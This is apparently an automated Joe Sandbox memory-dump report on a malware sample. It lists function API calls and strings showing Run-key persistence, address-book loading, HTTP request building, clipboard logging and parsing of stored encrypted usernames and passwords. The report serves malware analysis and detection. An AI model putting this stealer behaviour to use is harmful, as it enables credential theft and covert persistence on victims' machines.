Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Free$Allocate$CloseCreate
String ID:
API String ID: 4126010716-0
Opcode ID: fdc5e3ee20ed60d4e07c44fd8f37e55bf11420a0a541ab49eccc226c616b289a
Instruction ID: 4723000341086644b40cdc8751e45206617a1b685a209c89b19c4adbed6490c9
Opcode Fuzzy Hash: fdc5e3ee20ed60d4e07c44fd8f37e55bf11420a0a541ab49eccc226c616b289a
Instruction Fuzzy Hash: 1351B9B1C00259EFDF11DFD4DC949EEBBBAFB18348B10806AE515A6660D3319E91DF60

Uniqueness

Uniqueness Score: 100.00%

Function 001D35BC, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 132memorystringUNIQUE

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,?,00000000), ref: 001D35EC
StrTrimA.SHLWAPI(00000000, ), ref: 001D3602
HeapFree.KERNEL32(00000000,?), ref: 001D3638
RtlImageNtHeader.NTDLL(?), ref: 001D3664
HeapFree.KERNEL32(00000000,00000000,00000001,?,?), ref: 001D3725

Part of subcall function 001D1DE6: lstrlen.KERNEL32(?,00000000,?,00000001,001C62CA,00000000,?,?,?,?,?,?,?,?,001CD74D,?), ref: 001D1DEF
Part of subcall function 001D1DE6: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,?,?,?,?,?,001CD74D,?), ref: 001D1E12
Part of subcall function 001D1DE6: memset.NTDLL ref: 001D1E21

lstrlen.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 001D36D3
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 001D3703

Strings

TorClient, xrefs: 001D36A1, 001D36EE
, xrefs: 001D35FC

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
String ID: $TorClient
API String ID: 239510280-2371105432
Opcode ID: a1a453215f4803236ae3037c7a01791f975e6cbb9d45e1541151fdda45aeb06e
Instruction ID: 3fcc9981a90ae83e7d5f042d695c2446ea89695281e653b2323eeb6cffce99aa
Opcode Fuzzy Hash: a1a453215f4803236ae3037c7a01791f975e6cbb9d45e1541151fdda45aeb06e
Instruction Fuzzy Hash: 74411772204741BFD3126B649C89F1F7BAAEB54B10F10442AF6649A3D1DBB1CE44C753

Uniqueness

Uniqueness Score: 100.00%

Function 001CB46B, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 108stringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001DE46B: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,001D5985,00000000,00000000,00000004,00000000,?,001D1D3E,00000000,?,00000008), ref: 001DE477
Part of subcall function 001DE46B: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,001D5985,00000000,00000000,00000004,00000000,?,001D1D3E,00000000), ref: 001DE4D5
Part of subcall function 001DE46B: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE4E5

lstrlen.KERNEL32(?,?,00000000,00000000,00000004), ref: 001CB4B7
wsprintfA.USER32 ref: 001CB4E5
lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 001CB543
GetLastError.KERNEL32 ref: 001CB55A
ResetEvent.KERNEL32(?), ref: 001CB56E
ResetEvent.KERNEL32(?), ref: 001CB573
GetLastError.KERNEL32 ref: 001CB58C

Strings

`, xrefs: 001CB51E
Content-Type: application/octet-stream, xrefs: 001CB4DB

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
String ID: Content-Type: application/octet-stream$`
API String ID: 2276693960-1382853987
Opcode ID: bca611cb2b973b1856ec17e4e80fdee348f440a83e9a4728e2d9c208d37391b2
Instruction ID: 5a2380ab63374eb07aacc07d20ff7a3df5402081b116680f70d2a46974c7769f
Opcode Fuzzy Hash: bca611cb2b973b1856ec17e4e80fdee348f440a83e9a4728e2d9c208d37391b2
Instruction Fuzzy Hash: BC414771800249AFDB219FA4CC8AFAE7BB9FF24355F10042AF911D6161EB34DA54DFA0

Uniqueness

Uniqueness Score: 100.00%

Function 001CB876, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 97memoryUNIQUE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,001CA8CB,00000000), ref: 001CB890
RtlAllocateHeap.NTDLL(00000000,00000024), ref: 001CB8A5
memset.NTDLL ref: 001CB8B2
HeapFree.KERNEL32(00000000,00000000,?,001CA8CA,?,?,00000000,?,00000000,001D07A5,?,00000000), ref: 001CB8CF
memcpy.NTDLL(?,?,001CA8CA,?,001CA8CA,?,?,00000000,?,00000000,001D07A5,?,00000000), ref: 001CB8F0

Strings

Transfer-Encoding:, xrefs: 001CB94D
Content-Length:, xrefs: 001CB920
chun, xrefs: 001CB95E
Referer: , xrefs: 001CB96E

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Allocate$Freememcpymemset
String ID: Content-Length:$Referer: $Transfer-Encoding:$chun
API String ID: 2362494589-2246273904
Opcode ID: b526b5d00a858cd8a84d632bed3860c1338257ba6772c3c8f26b8db60b3f80a2
Instruction ID: 1583a605280dca5a9d0c9b0f9b716f7568e19cf3e4d28730b97ef4f6d1f186d6
Opcode Fuzzy Hash: b526b5d00a858cd8a84d632bed3860c1338257ba6772c3c8f26b8db60b3f80a2
Instruction Fuzzy Hash: 7431AD71604B05AFD7309F66CC82F1ABBE8EF24314F04852DE95ADB6A0C770E941CB51

Uniqueness

Uniqueness Score: 100.00%

Function 001C26CA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 001C26E5
RegCloseKey.ADVAPI32(?), ref: 001C2796

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

LoadLibraryA.KERNEL32(00000000), ref: 001C2733
GetProcAddress.KERNEL32(00000000,WABOpen), ref: 001C2745
GetLastError.KERNEL32 ref: 001C2764
FreeLibrary.KERNEL32(00000000), ref: 001C2776
GetLastError.KERNEL32 ref: 001C277E

Strings

WABOpen, xrefs: 001C273F
Software\Microsoft\WAB\DLLPath, xrefs: 001C26D6

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
String ID: Software\Microsoft\WAB\DLLPath$WABOpen
API String ID: 1628847533-1249168598
Opcode ID: 383d4a4dcbfa6a23cb309932dee5b6625c8a1430ba2b34b3c2453fd2ee5d9b32
Instruction ID: d4ee62769885336a104b7fd208e93d3143438de19c3a3367eb732de3ffbb00b0
Opcode Fuzzy Hash: 383d4a4dcbfa6a23cb309932dee5b6625c8a1430ba2b34b3c2453fd2ee5d9b32
Instruction Fuzzy Hash: 0021C531900358FBCB21AFE59DC8DAEBF7DEBA4750B140169F911B6120E7718E40DB50

Uniqueness

Uniqueness Score: 4.01%

Function 001D6299, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76registrymemorystringUNIQUE

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000001), ref: 001D62B3

Part of subcall function 001CECE4: RegCloseKey.ADVAPI32(001D62D8,001D62D8,00000000,00000000,00000000,00000000), ref: 001CED6B

lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 001D62EB
lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D62F8
RtlEnterCriticalSection.NTDLL(00000000), ref: 001D632C
HeapFree.KERNEL32(00000000,?), ref: 001D6341
RtlLeaveCriticalSection.NTDLL(00000000), ref: 001D6351
HeapFree.KERNEL32(00000000,?), ref: 001D6367
RegCloseKey.ADVAPI32(?), ref: 001D636C

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 001D62A4

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CloseCriticalFreeHeapSection$EnterLeaveOpenlstrcmpilstrlen
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 3108279940-1428018034
Opcode ID: 547d7f644ec8a1c39e742814202e26237bf0a0cbe61df49c64f9e966a5023d63
Instruction ID: cec27ec2d3d2ad66bb873c46d11cdb3687ff24d168d315fe707aa38eda93f9b8
Opcode Fuzzy Hash: 547d7f644ec8a1c39e742814202e26237bf0a0cbe61df49c64f9e966a5023d63
Instruction Fuzzy Hash: 25214535800648FFCF219FA5EC88CAEBBBAFB54304B148026F504AA660D7319E90DF50

Uniqueness

Uniqueness Score: 100.00%

Function 001CB754, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75memoryUNIQUE

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,?), ref: 001CB76C
StrChrA.SHLWAPI(00000001,?), ref: 001CB77D

Part of subcall function 001DF81D: lstrlen.KERNEL32(001C23C8,?,00000000,00000000,?,001C23C8,00000000,Referer: ,00000001,00000000,00000001), ref: 001DF82F
Part of subcall function 001DF81D: StrChrA.SHLWAPI(00000001,0000000D,?,001C23C8,00000000,Referer: ,00000001,00000000,00000001), ref: 001DF867

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CB7B6
memcpy.NTDLL(00000000,http://,00000007), ref: 001CB7DC
memcpy.NTDLL(00000000,?,?,00000000,http://,00000007), ref: 001CB7EB
memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007), ref: 001CB7FD

Strings

Host:, xrefs: 001CB78D
https://, xrefs: 001CB7C8
http://, xrefs: 001CB7D1, 001CB7DA

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID: Host:$http://$https://
API String ID: 1819133394-2811860193
Opcode ID: ce470be871e6d80247daa1b2fca4f654b5394fdaa8035a3cb3c974b71e53f121
Instruction ID: 1bd89d643a96ceb6c5b1934a5e4874014ed222b3ef056f2e22522c94116f28e9
Opcode Fuzzy Hash: ce470be871e6d80247daa1b2fca4f654b5394fdaa8035a3cb3c974b71e53f121
Instruction Fuzzy Hash: 9221A172904608BBDB219FA9DC86F9EBBACDF14794F144015F904EB291D770DE808B90

Uniqueness

Uniqueness Score: 100.00%

Function 001C4721, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55registrymemorystringUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(001C2B5E,00000000,00000000,001E6380,?,?,001C68C9,001C2B5E,00000000,001C2B5E,001E6360), ref: 001C4734
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001C4742
wsprintfA.USER32 ref: 001C4757
RegCreateKeyA.ADVAPI32(80000001,001E6360,00000000), ref: 001C476F
lstrlen.KERNEL32(?), ref: 001C477E
RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 001C478C
RegCloseKey.ADVAPI32(?), ref: 001C4797
HeapFree.KERNEL32(00000000,00000000), ref: 001C47A6

Strings

@%s@, xrefs: 001C4751

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
String ID: @%s@
API String ID: 1575615994-4128794767
Opcode ID: 5fc1779e37f2d856b35d952a602330817f83c3f57dbc14afd42ad1daa0b543f8
Instruction ID: 36f066413490c873ac603f38e70cc8dbc26aafa98dec40ac3a48bf763ad9fd2f
Opcode Fuzzy Hash: 5fc1779e37f2d856b35d952a602330817f83c3f57dbc14afd42ad1daa0b543f8
Instruction Fuzzy Hash: C1015E36100688BFEB125BD4ECC9FAE3B7EEB45758F100025FA04995B0DBB29D90DB50

Uniqueness

Uniqueness Score: 100.00%

Function 001CDC47, Relevance: 15.3, APIs: 10, Instructions: 300memorythreadUNIQUE

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001CDCBE
VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001CDCDD
GetLastError.KERNEL32 ref: 001CDF9A
RtlEnterCriticalSection.NTDLL(?), ref: 001CDFAA
RtlLeaveCriticalSection.NTDLL(?), ref: 001CDFBB
RtlExitUserThread.NTDLL(?), ref: 001CDFC9

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AllocCriticalSectionVirtual$EnterErrorExitLastLeaveThreadUser
String ID:
API String ID: 2137648861-0
Opcode ID: 2a3cc07dc03830897b2654e04861e327ac80a4dfa940031311e33a517e401c7d
Instruction ID: a6cd7938e7ccda5688d5621554a5beddb7b1faf855b70f75dd07d0f4fafd0c84
Opcode Fuzzy Hash: 2a3cc07dc03830897b2654e04861e327ac80a4dfa940031311e33a517e401c7d
Instruction Fuzzy Hash: 39B13571900649AFEB209F61DC84FAABBBABB28304F10453DF91AC65A1E770DD85CF51

Uniqueness

Uniqueness Score: 100.00%

Function 001C6018, Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(001E54B4,?,00000000,?,001C9A18,001E54E4), ref: 001C6065
VirtualProtect.KERNEL32(00000000,00000000,00000040,-00000020,?,00000000,?,001C9A18,001E54E4), ref: 001C6077
lstrcpy.KERNEL32(00000000,001E54B4), ref: 001C6086
VirtualProtect.KERNEL32(00000000,00000000,?,-00000020,?,00000000,?,001C9A18,001E54E4), ref: 001C6097
VirtualProtect.KERNEL32(?,00000005,00000040,-00000020,001E25B8,00000018,001DDA59,?,00000000,?,001C9A18,001E54E4,00000000), ref: 001C60CD
VirtualProtect.KERNEL32(?,00000004,?,-00000020,?,00000000,?,001C9A18,001E54E4,00000000), ref: 001C60E8
VirtualProtect.KERNEL32(?,00000004,00000040,-00000020,001E25B8,00000018,001DDA59,?,00000000,?,001C9A18,001E54E4,00000000), ref: 001C60FD
VirtualProtect.KERNEL32(?,00000004,00000040,-00000020,001E25B8,00000018,001DDA59,?,00000000,?,001C9A18,001E54E4,00000000), ref: 001C612A
VirtualProtect.KERNEL32(?,00000004,?,-00000020,?,00000000,?,001C9A18,001E54E4,00000000), ref: 001C6144
GetLastError.KERNEL32(?,00000000,?,001C9A18,001E54E4,00000000), ref: 001C614B

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
String ID:
API String ID: 3676034644-0
Opcode ID: 8d085408215ab458fab68355e53e4868082408618ccda8a3b61f7baa028db2a1
Instruction ID: 6cc560d1c398d0147da8362ff21679ec9bc81a8df23ece2ca22d6439b6f3b7ed
Opcode Fuzzy Hash: 8d085408215ab458fab68355e53e4868082408618ccda8a3b61f7baa028db2a1
Instruction Fuzzy Hash: 7C415AB1900B09EFDB219FA4CC40FAEB7B9FB18310F04861DE656AA5A1D735E905CF20

Uniqueness

Uniqueness Score: 0.90%

Function 001CD6F9, Relevance: 15.1, APIs: 10, Instructions: 103stringUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000008,00000000,00000000,00000008,00000000,00000000,00000000,00000000,00000000,?,?,001D1179,00000000,?,00000000), ref: 001CD70E
StrChrA.SHLWAPI(?,0000002F,?,?,001D1179,00000000,?,00000000,00000000,?,?,?,001DAA9A,?), ref: 001CD734
lstrlen.KERNEL32(00000000,?,?,?,001D1179,00000000,?,00000000,00000000,?,?,?,001DAA9A,?), ref: 001CD759
lstrlen.KERNEL32(?,?,?,?,001D1179,00000000,?,00000000,00000000,?,?,?,001DAA9A,?), ref: 001CD775
lstrlen.KERNEL32(00000000,?,?,001D1179,00000000,?,00000000,00000000,?,?,?,001DAA9A,?), ref: 001CD77B
memcpy.NTDLL(00000000,74736F48,00000005,?,?,?,001D1179,00000000,?,00000000,00000000,?,?,?,001DAA9A,?), ref: 001CD79C
memcpy.NTDLL(00000006,74736F48,00000001,00000000,74736F48,00000005,?,?,?,001D1179,00000000,?,00000000,00000000), ref: 001CD7AE
memcpy.NTDLL(00000000,00000000,00000000,00000006,74736F48,00000001,00000000,74736F48,00000005,?,?,?,001D1179,00000000,?,00000000), ref: 001CD7C3
lstrcpy.KERNEL32(00000000,?), ref: 001CD7D1
lstrcat.KERNEL32(00000000,00000000), ref: 001CD7E5

Part of subcall function 001C3F6D: RtlFreeHeap.NTDLL(00000000,?,001C1091,00000000), ref: 001C3F79

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlen$memcpy$FreeHeaplstrcatlstrcpy
String ID:
API String ID: 622087764-0
Opcode ID: 18c38cfbdf7ae3dd8a71b06fb54d276f94a9d5adb9bd33bf3cb961d6de207b43
Instruction ID: fd6fe62cbc257dd9bc75da752bb0a653eda97339a17cebea68b420fe9442fc1e
Opcode Fuzzy Hash: 18c38cfbdf7ae3dd8a71b06fb54d276f94a9d5adb9bd33bf3cb961d6de207b43
Instruction Fuzzy Hash: 51319C71D00249BFCB11AFA8DC89E9EBBB8EF65348F1440A9F514A7252DB70DE00CB60

Uniqueness

Uniqueness Score: 100.00%

Function 001CE193, Relevance: 15.1, APIs: 10, Instructions: 95filememorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 001CCD9E: memset.NTDLL ref: 001CCDC0
Part of subcall function 001CCD9E: CloseHandle.KERNEL32(?,?,?,?,?), ref: 001CCE6D

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001CE1DA
CloseHandle.KERNEL32(?), ref: 001CE1E6
PathFindFileNameW.SHLWAPI(?), ref: 001CE1F6
lstrlenW.KERNEL32(00000000), ref: 001CE200
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CE211
wcstombs.NTDLL ref: 001CE222
lstrlen.KERNEL32(?), ref: 001CE22F
UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 001CE26B
HeapFree.KERNEL32(00000000,00000000), ref: 001CE27D
DeleteFileW.KERNEL32(?), ref: 001CE28B

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
String ID:
API String ID: 2256351002-0
Opcode ID: 8607c3b83a250d884ffdcc9ca5c0443a6ed4cf8b703a3bd7b50b7b388955687e
Instruction ID: fddeb5c6a8493d6153af01b1f347cdadec5f9d59489accebbc7800f893bab2b5
Opcode Fuzzy Hash: 8607c3b83a250d884ffdcc9ca5c0443a6ed4cf8b703a3bd7b50b7b388955687e
Instruction Fuzzy Hash: 25311871900189EFCF21AFE4EC89EAE7BBEFF54355B004069FA05A6560D7318A91DB60

Uniqueness

Uniqueness Score: 2.28%

Function 001D4A52, Relevance: 15.1, APIs: 10, Instructions: 64sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,001C8B63), ref: 001D4A66

Part of subcall function 001D3C71: InterlockedExchange.KERNEL32(?,000000FF), ref: 001D3C78

WaitForSingleObject.KERNEL32(000000FF,000000FF,?), ref: 001D4A80
CloseHandle.KERNEL32(00000000), ref: 001D4A89
CloseHandle.KERNEL32(?,?), ref: 001D4A97
RtlEnterCriticalSection.NTDLL(?), ref: 001D4AA3
RtlLeaveCriticalSection.NTDLL(?), ref: 001D4ACC
Sleep.KERNEL32(000001F4), ref: 001D4ADB
CloseHandle.KERNEL32(?), ref: 001D4AE8
LocalFree.KERNEL32(?), ref: 001D4AF6
RtlDeleteCriticalSection.NTDLL(?), ref: 001D4B00

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 1408595562-0
Opcode ID: dc56b1c3d95e2178ec16b1a7f8bea0e5f41742d9452c5c967b62be2bb68a262b
Instruction ID: b3e47e9972f57b17707c5c54ae2cb3c63638fe3ed6ab243a6edf469682aedf89
Opcode Fuzzy Hash: dc56b1c3d95e2178ec16b1a7f8bea0e5f41742d9452c5c967b62be2bb68a262b
Instruction Fuzzy Hash: C5117975140256AFCB21AFA5EC88A1F77BCBF14301300481AF69397AA1CB34E980CB20

Uniqueness

Uniqueness Score: 0.90%

Function 001C41B0, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194timestringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

FileTimeToLocalFileTime.KERNEL32(00000000,001D64BA), ref: 001C420F
FileTimeToSystemTime.KERNEL32(001D64BA,?), ref: 001C421D
lstrlenW.KERNEL32(00000010), ref: 001C422D
lstrlenW.KERNEL32(00000218), ref: 001C4239
FileTimeToLocalFileTime.KERNEL32(00000008,001D64BA), ref: 001C431F
FileTimeToSystemTime.KERNEL32(001D64BA,?), ref: 001C432D

Strings

%02u-%02u-%02u %02u:%02u:%02uClipboard%s, xrefs: 001C4358
%02u-%02u-%02u %02u:%02u:%02u%s%s%s, xrefs: 001C42B0

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Time$File$LocalSystemlstrlen$AllocateHeap
String ID: %02u-%02u-%02u %02u:%02u:%02u%s%s%s$%02u-%02u-%02u %02u:%02u:%02uClipboard%s
API String ID: 1122361434-2207419989
Opcode ID: 146ff679e32bf1de84e3123946eb54660032eca01764850987b1acd7c1336b31
Instruction ID: 68bd20a40ddcf1ad7d7b0dd8ab750c3de3d4d63854aa0bf4c916094c85696597
Opcode Fuzzy Hash: 146ff679e32bf1de84e3123946eb54660032eca01764850987b1acd7c1336b31
Instruction Fuzzy Hash: 81714971A00219ABCB10DFE9C894EEEB7FCBB58344F14416AF545E7250E738DA85DB60

Uniqueness

Uniqueness Score: 100.00%

Function 001DA37B, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 169stringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001D50C0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,?,00000080,00000000,00000008,00000000,00000000,?,?,001C1CDE,00000000,?,?), ref: 001D50DE
Part of subcall function 001D50C0: GetFileSize.KERNEL32(00000000,00000000,?,?,001C1CDE,00000000,?,?,?,00000000,-00000007,001D118C,-00000007,?,00000000), ref: 001D50EE
Part of subcall function 001D50C0: CloseHandle.KERNEL32(000000FF,?,?,001C1CDE,00000000,?,?,?,00000000,-00000007,001D118C,-00000007,?,00000000), ref: 001D5150

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

Part of subcall function 001D1DE6: lstrlen.KERNEL32(?,00000000,?,00000001,001C62CA,00000000,?,?,?,?,?,?,?,?,001CD74D,?), ref: 001D1DEF
Part of subcall function 001D1DE6: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,?,?,?,?,?,001CD74D,?), ref: 001D1E12
Part of subcall function 001D1DE6: memset.NTDLL ref: 001D1E21

strstr.NTDLL ref: 001DA436

Part of subcall function 001CD90E: memset.NTDLL ref: 001CD938
Part of subcall function 001CD90E: lstrlen.KERNEL32(001DA453,00000001,00000000,?,00000000,00000000,00002000,00000000,001E0C2D,?,?,?,?,?,?,001DA453), ref: 001CD94C
Part of subcall function 001CD90E: memcpy.NTDLL(00000000,?,?), ref: 001CD9A1

strstr.NTDLL ref: 001DA47B
StrChrA.SHLWAPI(?,00000040,?), ref: 001DA4A4

Strings

hostname, xrefs: 001DA3D3
://, xrefs: 001DA4CA
encryptedUsername, xrefs: 001DA40E
encryptedPassword, xrefs: 001DA453
type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S, xrefs: 001DA4EF

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Filelstrlenmemcpymemsetstrstr$AllocateCloseCreateHandleHeapSize
String ID: ://$encryptedPassword$encryptedUsername$hostname$type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S
API String ID: 2194731920-2558769663
Opcode ID: 35677a20937dc5738c36373f2331527a4e3c57fd7b71480cc7bcc17391098bcb
Instruction ID: cc08e73b9c85093e1819aeefe59eee30d76ff73fe183db675ac2704b7f9ea415
Opcode Fuzzy Hash: 35677a20937dc5738c36373f2331527a4e3c57fd7b71480cc7bcc17391098bcb
Instruction Fuzzy Hash: F551B131D00615ABCF22DFA9DC41BAEBBB9AF14710F55845AF818B7340DB74DE009BA2

Uniqueness

Uniqueness Score: 100.00%

Function 001D02F9, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(00000001,00000000,00000000,779F5520,001DA99F,779F5520,00000001,@ID@,001D4570,?), ref: 001D0310
lstrlen.KERNEL32(?), ref: 001D0320
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001D0354
RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 001D037F
memcpy.NTDLL(00000000,?,?), ref: 001D039E
HeapFree.KERNEL32(00000000,00000000), ref: 001D03FF
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 001D0421

Strings

W, xrefs: 001D044D

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Allocatelstrlenmemcpy$Free
String ID: W
API String ID: 3204852930-655174618
Opcode ID: ac9223bfe4d75254fddb71dde89ec4ad940b31ca627459c9cffd157b21bccc82
Instruction ID: 7bb44dc741a79b14767ec7ec47b54602320a9cefef1d1c0f7330cd1c1e4a48e4
Opcode Fuzzy Hash: ac9223bfe4d75254fddb71dde89ec4ad940b31ca627459c9cffd157b21bccc82
Instruction Fuzzy Hash: E44138B1900249EFCF12CF95CC84EAE7BB9FF48344F14806AE914AB211E7319A54DBA0

Uniqueness

Uniqueness Score: 100.00%

Function 001C75DC, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 118memoryUNIQUE

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 001C75FD

Part of subcall function 001DB086: lstrlenW.KERNEL32(00000000,00000000,00000094,%APPDATA%\Microsoft\,00000000,?,?,001C761D,?), ref: 001DB0AB
Part of subcall function 001DB086: RtlAllocateHeap.NTDLL(00000000,?), ref: 001DB0BD
Part of subcall function 001DB086: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C761D,?), ref: 001DB0DA
Part of subcall function 001DB086: lstrlenW.KERNEL32(00000000,?,?,001C761D,?), ref: 001DB0E6
Part of subcall function 001DB086: HeapFree.KERNEL32(00000000,00000000,?,?,001C761D,?), ref: 001DB0FA

RtlEnterCriticalSection.NTDLL(00000000), ref: 001C7635
CloseHandle.KERNEL32(?), ref: 001C7643
HeapFree.KERNEL32(00000000,?,?,00000001,?), ref: 001C76FB
RtlLeaveCriticalSection.NTDLL(00000000), ref: 001C770A
HeapFree.KERNEL32(00000000,00000000,?), ref: 001C771D

Strings

